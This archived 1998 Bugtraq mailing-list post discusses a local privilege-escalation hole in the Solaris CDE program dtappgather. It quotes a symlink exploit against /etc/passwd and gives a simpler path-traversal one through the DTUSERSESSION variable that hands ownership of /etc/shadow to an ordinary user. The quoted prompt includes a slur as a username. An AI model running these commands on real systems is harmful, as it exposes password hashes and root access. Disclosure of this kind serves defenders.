The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

/usr/dt/bin/dtappgather exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Wed, 25 Feb 1998 13:14:50 +0500 (ESK)
Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: /usr/dt/bin/dtappgather exploit

>
>         I suppose you have learnt about CERT's advisory on dtappgather
> program. Well, here's the exploit:
>
> nigg0r@host% ls -l /etc/passwd
> -r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
> nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> nigg0r@host% dtappgather

    the exploit is much simpler than that.
        hey, it's even documented on the man page :-)

    Simply

    $ id
    uid=6969(foo) gid=666(bar)
    $ ls -l /etc/shadow
    -r--------   1 root     sys          234 Nov  7  1999 /etc/shadow
    $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
    $ ls -l /etc/shadow
    -r-xr-xr-x   1 foo      bar          234 Nov  7  1999 /etc/shadow


    Anyway, your exploit has an advantage: it works (at least,
    in solaris 2.5), even after patching CDE according to CERT
    advisory.
    Solaris 2.6 seems to have the right permisions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.